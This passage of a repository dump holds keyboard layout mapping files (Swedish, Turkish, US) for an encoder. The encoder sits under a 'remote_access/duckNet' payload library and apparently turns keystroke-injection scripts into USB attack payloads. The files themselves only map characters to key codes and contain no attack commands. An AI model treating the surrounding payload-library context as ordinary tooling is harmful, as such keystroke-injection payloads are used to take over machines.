MODIFIERKEY_SHIFT\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\nASCII_2A = KEY_EQUAL, MODIFIERKEY_SHIFT\nASCII_27 = KEY_MINUS\nASCII_2B = KEY_EQUAL\nASCII_7E = KEY_1, MODIFIERKEY_RIGHT_ALT\nASCII_60 = KEY_7, MODIFIERKEY_RIGHT_ALT\nASCII_5C = KEY_Q, MODIFIERKEY_RIGHT_ALT\nASCII_7C = KEY_W, MODIFIERKEY_RIGHT_ALT\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_F7 = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_D7 = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\nASCII_5B = KEY_F, MODIFIERKEY_RIGHT_ALT\nASCII_5D = KEY_G, MODIFIERKEY_RIGHT_ALT\nUNICODE_142 = KEY_K, MODIFIERKEY_RIGHT_ALT\nUNICODE_141 = KEY_L, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_DF = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_A4 = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\nASCII_3C = KEY_NON_US_100\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\nASCII_40 = KEY_V, MODIFIERKEY_RIGHT_ALT\nASCII_7B = KEY_B, MODIFIERKEY_RIGHT_ALT\nASCII_7D = KEY_N, MODIFIERKEY_RIGHT_ALT\nASCII_2E = KEY_PERIOD\nASCII_2D = KEY_SLASH\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\nASCII_2C = KEY_COMMA\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\nISO_8859_1_A7 = KEY_M, MODIFIERKEY_RIGHT_ALT\n// Not needed chars // input: ¸ ¨ ˇ ^ ˘ ° ˛ ˙ ´ ˝ ¨ ¸ output: ¸¨ˇ^˘°˛˙´˝¨¸ (notice no space!)\nISO_8859_1_B8 = KEY_TILDE\nISO_8859_1_A8 = KEY_TILDE, MODIFIERKEY_SHIFT\nUNICODE_2C7 = KEY_2, MODIFIERKEY_RIGHT_ALT\nASCII_5E = KEY_3, MODIFIERKEY_RIGHT_ALT\nUNICODE_2D8 = KEY_4, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B0 = KEY_5, MODIFIERKEY_RIGHT_ALT\nUNICODE_2DB = KEY_6, MODIFIERKEY_RIGHT_ALT\nUNICODE_2D9 = KEY_8, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B4 = KEY_9, MODIFIERKEY_RIGHT_ALT\nUNICODE_2DD = KEY_0, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_A8 = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B8 = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\n// Numbers: 0 1 2 3 4 5 6 7 8 9\nASCII_30 = KEY_0\nASCII_31 = KEY_1\nASCII_32 = KEY_2\nASCII_33 = KEY_3\nASCII_34 = KEY_4\nASCII_35 = KEY_5\nASCII_36 = KEY_6\nASCII_37 = KEY_7\nASCII_38 = KEY_8\nASCII_39 = KEY_9" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/sv.properties", "content": "//LAYOUT_SWEDISH\n//Credits go to r.hegazi & shalafi for patch (11/09/2013)\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_RIGHT_ALT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_BACKSLASH\n// 39 ' \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_MINUS\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\n// 92 \nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_EQUAL, MODIFIERKEY_SHIFT\n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT\n// 124 |\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\n// 125 }\n//ASCII_7E = TILDE_BITS + KEY_SPACE\n// 126 ~\nASCII_7F = KEY_BACKSPACE\n// 127\n\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A3 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 163 £ Pound Sign\nISO_8859_1_A4 = KEY_4, MODIFIERKEY_SHIFT\n// 164 ¤ Currency Sign\nISO_8859_1_A7 = KEY_TILDE\n// 167 § SECTION SIGN\n//ISO_8859_1_A8 = DIAERESIS_BITS + KEY_SPACE\n// 168 ¨ DIAERESIS\nISO_8859_1_AB = KEY_4\n// 171 « LEFT DOUBLE ANGLE QUOTE\n//ISO_8859_1_B4 = ACUTE_ACCENT_BITS + KEY_SPACE\n// 180 ´ ACUTE ACCENT\nISO_8859_1_B5 = KEY_M, MODIFIERKEY_RIGHT_ALT\n// 181 µ MICRO SIGN\nISO_8859_1_BD = KEY_TILDE, MODIFIERKEY_SHIFT\n// 189 ½ FRACTION ONE HALF\n//ISO_8859_1_C0 = GRAVE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 192 À A GRAVE\n//ISO_8859_1_C1 = ACUTE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 193 Á A ACUTE\n//ISO_8859_1_C2 = CIRCUMFLEX_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 194  A CIRCUMFLEX\n//ISO_8859_1_C3 = TILDE_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 195 à A TILDE\nISO_8859_1_C4 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 196 Ä A DIAERESIS\nISO_8859_1_C5 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 197 Å A RING ABOVE\n//ISO_8859_1_C8 = GRAVE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 200 È E GRAVE\n//ISO_8859_1_C9 = ACUTE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 201 É E ACUTE\n//ISO_8859_1_CA = CIRCUMFLEX_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 202 Ê E CIRCUMFLEX\n//ISO_8859_1_CB = DIAERESIS_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 203 Ë E DIAERESIS\n//ISO_8859_1_CC = GRAVE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 204 Ì I GRAVE\n//ISO_8859_1_CD = ACUTE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 205 Í I ACUTE\n//ISO_8859_1_CE = CIRCUMFLEX_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 206 Î I CIRCUMFLEX\n//ISO_8859_1_CF = DIAERESIS_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 207 Ï I DIAERESIS\n//ISO_8859_1_D0 = KEY_D, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 208 Ð ETH\n//ISO_8859_1_D1 = TILDE_BITS + KEY_N, MODIFIERKEY_SHIFT\n// 209 Ñ N TILDE\n//ISO_8859_1_D2 = GRAVE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 210 Ò O GRAVE\n//ISO_8859_1_D3 = ACUTE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 211 Ó O ACUTE\n//ISO_8859_1_D4 = CIRCUMFLEX_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 212 Ô O CIRCUMFLEX\n//ISO_8859_1_D5 = TILDE_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 213 Õ O TILDE\nISO_8859_1_D6 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 214 Ö O DIAERESIS\n//ISO_8859_1_D9 = GRAVE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 217 Ù U GRAVE\n//ISO_8859_1_DA = ACUTE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 218 Ú U ACUTE\n//ISO_8859_1_DB = CIRCUMFLEX_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 219 Û U CIRCUMFLEX\n//ISO_8859_1_DC = DIAERESIS_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 220 Ü U DIAERESIS\n//ISO_8859_1_DD = ACUTE_ACCENT_BITS + KEY_Y, MODIFIERKEY_SHIFT\n// 221 Ý Y ACUTE\n//ISO_8859_1_DE = KEY_T, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 222 Þ THORN\nISO_8859_1_DF = KEY_S, MODIFIERKEY_RIGHT_ALT\n// 223 ß SHARP S\n//ISO_8859_1_E0 = GRAVE_ACCENT_BITS + KEY_A\n// 224 à a GRAVE\n//ISO_8859_1_E1 = ACUTE_ACCENT_BITS + KEY_A\n// 225 á a ACUTE\n//ISO_8859_1_E2 = CIRCUMFLEX_BITS + KEY_A\n// 226 â a CIRCUMFLEX\n//ISO_8859_1_E3 = TILDE_BITS + KEY_A\n// 227 ã a TILDE\nISO_8859_1_E4 = KEY_QUOTE\n// 228 ä a DIAERESIS\nISO_8859_1_E5 = KEY_LEFT_BRACE\n// 229 å a RING ABOVE\n//ISO_8859_1_E8 = GRAVE_ACCENT_BITS + KEY_E\n// 232 è e GRAVE\n//ISO_8859_1_E9 = ACUTE_ACCENT_BITS + KEY_E\n// 233 é e ACUTE\n//ISO_8859_1_EA = CIRCUMFLEX_BITS + KEY_E\n// 234 ê e CIRCUMFLEX\n//ISO_8859_1_EB = DIAERESIS_BITS + KEY_E\n// 235 ë e DIAERESIS\n//ISO_8859_1_EC = GRAVE_ACCENT_BITS + KEY_I\n// 236 ì i GRAVE\n//ISO_8859_1_ED = ACUTE_ACCENT_BITS + KEY_I\n// 237 í i ACUTE\n//ISO_8859_1_EE = CIRCUMFLEX_BITS + KEY_I\n// 238 î i CIRCUMFLEX\n//ISO_8859_1_EF = DIAERESIS_BITS + KEY_I\n// 239 ï i DIAERESIS\nISO_8859_1_F0 = KEY_D, MODIFIERKEY_RIGHT_ALT\n// 240 ð ETH\n//ISO_8859_1_F1 = TILDE_BITS + KEY_N\n// 241 ñ n TILDE\n//ISO_8859_1_F2 = GRAVE_ACCENT_BITS + KEY_O\n// 242 ò o GRAVE\n//ISO_8859_1_F3 = ACUTE_ACCENT_BITS + KEY_O\n// 243 ó o ACUTE\n//ISO_8859_1_F4 = CIRCUMFLEX_BITS + KEY_O\n// 244 ô o CIRCUMFLEX\n//ISO_8859_1_F5 = TILDE_BITS + KEY_O\n// 245 õ o TILDE\nISO_8859_1_F6 = KEY_SEMICOLON\n// 246 ö o DIAERESIS\n//ISO_8859_1_F9 = GRAVE_ACCENT_BITS + KEY_U\n// 249 ù u GRAVE\n//ISO_8859_1_FA = ACUTE_ACCENT_BITS + KEY_U\n// 250 ú u ACUTE\n//ISO_8859_1_FB = CIRCUMFLEX_BITS + KEY_U\n// 251 û u CIRCUMFLEX\n//ISO_8859_1_FC = DIAERESIS_BITS + KEY_U\n// 252 ü u DIAERESIS\n//ISO_8859_1_FD = ACUTE_ACCENT_BITS + KEY_Y\n// 253 ý y ACUTE\nISO_8859_1_FE = KEY_T, MODIFIERKEY_RIGHT_ALT\n// 254 þ THORN\n//ISO_8859_1_FF = DIAERESIS_BITS + KEY_Y\n// 255 ÿ y DIAERESIS\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/tr.properties", "content": "// Turkish Layout\n// By gokhanokur44\n\n// 32 \nASCII_20 = KEY_SPACE\t\t\t\t\t\n // 33 !\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 34 \"\nASCII_22 = KEY_TILDE\t\t\t\t\t\n// 35 #\nASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 36 $\nASCII_24 = KEY_4, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 37 %\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\t\t\t\n// 38 &\nASCII_26 = KEY_7, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 39 ' \nASCII_27 = KEY_2, MODIFIERKEY_SHIFT\t\t\t\n// 40 ( \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\t\t\t\t\n// 41 )\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\t\t\t\n// 42 *\nASCII_2A = KEY_MINUS\t\t\n// 43 +\nASCII_2B = KEY_4, MODIFIERKEY_SHIFT\t\t\t\n// 44 ,\nASCII_2C = KEY_BACKSLASH\t\t\t\n// 45 -\nASCII_2D = KEY_EQUAL\t\t\t\t\n// 46 .\nASCII_2E = KEY_SLASH\t\t\t\n// 47 /\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\t\t\t\n// 48 0\nASCII_30 = KEY_0\t\t\t\t\n// 49 1\nASCII_31 = KEY_1\t\t\t\t\n// 50 2\nASCII_32 = KEY_2\t\t\t\t\n// 51 3\nASCII_33 = KEY_3\t\t\t\t\n// 52 4\nASCII_34 = KEY_4\t\t\t\t\n// 53 5\nASCII_35 = KEY_5\t\t\t\t\n// 54 6\nASCII_36 = KEY_6\t\t\t\t\n// 55 7\nASCII_37 = KEY_7\t\t\t\t\n// 55 8\nASCII_38 = KEY_8\t\t\t\t\n// 57 9\nASCII_39 = KEY_9\t\t\t\t\n// 58 :\nASCII_3A = KEY_SLASH, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 59 ;\nASCII_3B = KEY_BACKSLASH, MODIFIERKEY_SHIFT\t\t\n// 60 <\nASCII_3C = KEY_COMMA, MODIFIERKEY_SHIFT\t\t\t\n// 61 =\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 62 >\nASCII_3E = KEY_PERIOD, MODIFIERKEY_SHIFT\t\t\t\n// 63 ?\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\t\t\t\t\n// 64 @\nASCII_40 = KEY_Q, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 65 A\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 66 B\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\t\t\t\t\n// 67 C\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\t\t\t\t\n// 68 D\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\t\t\t\t\n// 69 E\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\t\t\t\t\n// 70 F\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\t\t\t\t\n// 71 G\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\t\t\t\t\n// 72 H\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\t\t\t\t\n// 73 I\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\t\t\t\t\n// 74 J\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\t\t\t\t\n// 75 K\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\t\t\t\t\n// 76 L\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\t\t\t\t\n// 77 M\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\t\t\t\n// 78 N\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\t\t\t\t\n// 79 O\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\t\t\t\t\n// 80 P\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\t\t\t\t\n// 81 Q\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\t\t\t\t\n// 82 R\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\t\t\t\t\n// 83 S\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\t\t\t\t\n// 84 T\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\t\t\t\t\n// 85 U\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\t\t\t\t\n// 86 V\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\t\t\t\t\n// 87 W\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\t\t\t\t\n// 88 X\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\t\t\t\t\n// 89 Y\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\t\t\t\t\n// 90 Z\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\t\t\t\t\n// 91 [\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 92 \nASCII_5C = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 93 ]\nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 94 ^\nASCII_5E = KEY_3, MODIFIERKEY_SHIFT\t\t\t\t\n// 95 _\nASCII_5F = KEY_EQUAL, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 96 `\nASCII_60 = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\t\t\n// 97 a\nASCII_61 = KEY_A\n// 98 b\nASCII_62 = KEY_B\t\t\t\t\t\n// 99 c\nASCII_63 = KEY_C\n// 100 d\nASCII_64 = KEY_D\t\t\t\t\t\n// 101 e\nASCII_65 = KEY_E\t\t\t\t\t\n// 102 f\nASCII_66 = KEY_F\t\t\t\t\t\n// 103 g\nASCII_67 = KEY_G\t\t\t\t\t\n// 104 h\nASCII_68 = KEY_H\t\t\t\t\t\n// 105 i\nASCII_69 = KEY_QUOTE\t\t\t\t\t\n// 106 j\nASCII_6A = KEY_J\t\t\t\t\t\n// 107 k\nASCII_6B = KEY_K\t\t\t\t\t\n// 108 l\nASCII_6C = KEY_L\t\t\t\t\t\n// 109 m\nASCII_6D = KEY_M\t\t\t\t\n// 110 n\nASCII_6E = KEY_N\t\t\t\t\t\n// 111 o\nASCII_6F = KEY_O\t\t\t\t\t\n// 112 p\nASCII_70 = KEY_P\t\t\t\t\t\n// 113 q\nASCII_71 = KEY_Q\t\t\t\t\t\n// 114 r\nASCII_72 = KEY_R\t\t\t\t\t\n// 115 s\nASCII_73 = KEY_S\t\t\t\t\t\n// 116 t\nASCII_74 = KEY_T\t\t\t\t\t\n// 117 u\nASCII_75 = KEY_U\t\t\t\t\t\n// 118 v\nASCII_76 = KEY_V\t\t\t\t\t\n// 119 w\nASCII_77 = KEY_W\t\t\t\t\t\n// 120 x\nASCII_78 = KEY_X\t\t\t\t\t\n// 121 y\nASCII_79 = KEY_Y\t\t\t\t\t\n// 122 z\nASCII_7A = KEY_Z\t\t\t\t\t\n// 123 {\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 124 |\nASCII_7C = KEY_BACKSLASH, MODIFIERKEY_SHIFT\t\t\n// 125 }\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 126 ~\nASCII_7E = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 127\nASCII_7F = KEY_BACKSPACE\t\t\t\t\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/us.properties", "content": "// US layout\n\n// 32 \nASCII_20 = KEY_SPACE\t\t\t\t\t\n // 33 !\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 34 \"\nASCII_22 = KEY_QUOTE, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 35 #\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\t\t\t\t\n// 36 $\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\t\t\t\t\n// 37 %\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\t\t\t\n// 38 &\nASCII_26 = KEY_7, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 39 ' \nASCII_27 = KEY_QUOTE\t\t\t\n// 40 ( \nASCII_28 = KEY_9, MODIFIERKEY_SHIFT\t\t\t\t\n// 41 )\nASCII_29 = KEY_0, MODIFIERKEY_SHIFT\t\t\t\n// 42 *\nASCII_2A = KEY_8, MODIFIERKEY_SHIFT\t\t\t\n// 43 +\nASCII_2B = KEY_EQUAL, MODIFIERKEY_SHIFT\t\t\t\n// 44 ,\nASCII_2C = KEY_COMMA\t\t\t\n// 45 -\nASCII_2D = KEY_MINUS\t\t\t\t\n// 46 .\nASCII_2E = KEY_PERIOD\t\t\t\n// 47 /\nASCII_2F = KEY_SLASH\t\t\t\n// 48 0\nASCII_30 = KEY_0\t\t\t\t\n// 49 1\nASCII_31 = KEY_1\t\t\t\t\n// 50 2\nASCII_32 = KEY_2\t\t\t\t\n// 51 3\nASCII_33 = KEY_3\t\t\t\t\n// 52 4\nASCII_34 = KEY_4\t\t\t\t\n// 53 5\nASCII_35 = KEY_5\t\t\t\t\n// 54 6\nASCII_36 = KEY_6\t\t\t\t\n// 55 7\nASCII_37 = KEY_7\t\t\t\t\n// 55 8\nASCII_38 = KEY_8\t\t\t\t\n// 57 9\nASCII_39 = KEY_9\t\t\t\t\n// 58 :\nASCII_3A = KEY_SEMICOLON, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 59 ;\nASCII_3B = KEY_SEMICOLON\t\t\n// 60 <\nASCII_3C = KEY_COMMA, MODIFIERKEY_SHIFT\t\t\t\t\n// 61 =\nASCII_3D = KEY_EQUAL\t\t\t\t\t\n// 62 >\nASCII_3E = KEY_PERIOD, MODIFIERKEY_SHIFT\t\t\t\n// 63 ?\nASCII_3F = KEY_SLASH, MODIFIERKEY_SHIFT\t\t\t\t\n// 64 @\nASCII_40 = KEY_2, MODIFIERKEY_SHIFT\t\t\t\t\n// 65 A\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 66 B\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\t\t\t\t\n// 67 C\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\t\t\t\t\n// 68 D\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\t\t\t\t\n// 69 E\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\t\t\t\t\n// 70 F\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\t\t\t\t\n// 71 G\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\t\t\t\t\n// 72 H\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\t\t\t\t\n// 73 I\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\t\t\t\t\n// 74 J\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\t\t\t\t\n// 75 K\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\t\t\t\t\n// 76 L\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\t\t\t\t\n// 77 M\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\t\t\t\n// 78 N\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\t\t\t\t\n// 79 O\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\t\t\t\t\n// 80 P\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\t\t\t\t\n// 81 Q\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\t\t\t\t\n// 82 R\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\t\t\t\t\n// 83 S\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\t\t\t\t\n// 84 T\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\t\t\t\t\n// 85 U\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\t\t\t\t\n// 86 V\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\t\t\t\t\n// 87 W\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\t\t\t\t\n// 88 X\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\t\t\t\t\n// 89 Y\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\t\t\t\t\n// 90 Z\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\t\t\t\t\n// 91 [\nASCII_5B = KEY_LEFT_BRACE\t\t\t\t\n// 92 \nASCII_5C = KEY_BACKSLASH\t\t\t\t\n// 